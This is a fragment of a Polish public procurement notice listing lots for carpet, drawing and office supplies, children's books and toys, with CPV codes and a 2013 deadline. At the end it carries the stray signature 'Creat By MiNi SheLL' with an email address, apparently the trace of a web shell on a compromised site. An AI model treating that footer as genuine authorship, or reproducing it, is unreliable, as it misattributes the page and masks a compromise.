<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykładzina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykładzina: 148,64 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.22.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kreda: 150 op.
Blok rysunkowy biały A4: 750 szt.
Kredki świecowe: 150 op.
Kredki ołówkowe: 150 op.
Pisaki: 300 op.
Pisaki do tablic suchościeralnych: 30 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.82.20.00-6, 30.19.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Książki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kolorowanki: 750 szt.
Książki: 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zabawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek dla lalek: 15 szt.
Mini kuchnia: 15 szt.
Tablica dwustronna do pisania: 15 szt.
Mini zjeżdżalnia: 11 szt.
Samochód wyścigowy: 30 szt.
Samochód ciężarowy dostawczy: 15 szt.
Samochód budowlany: 30 szt.
Lalka typu barbie: 45 szt.
Lalka typu bobas: 30 szt.
Klocki plastikowe duże: 15 szt.
Puzzle 15 elementów: 30 szt.
Puzzle 24 elementy: 30 szt.
Puzzle 30 elementów: 15 szt.
Puzzle 36 elementów: 15 szt.
Maskotki zwierzątka: 75 szt.
Domek namiot: 15 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com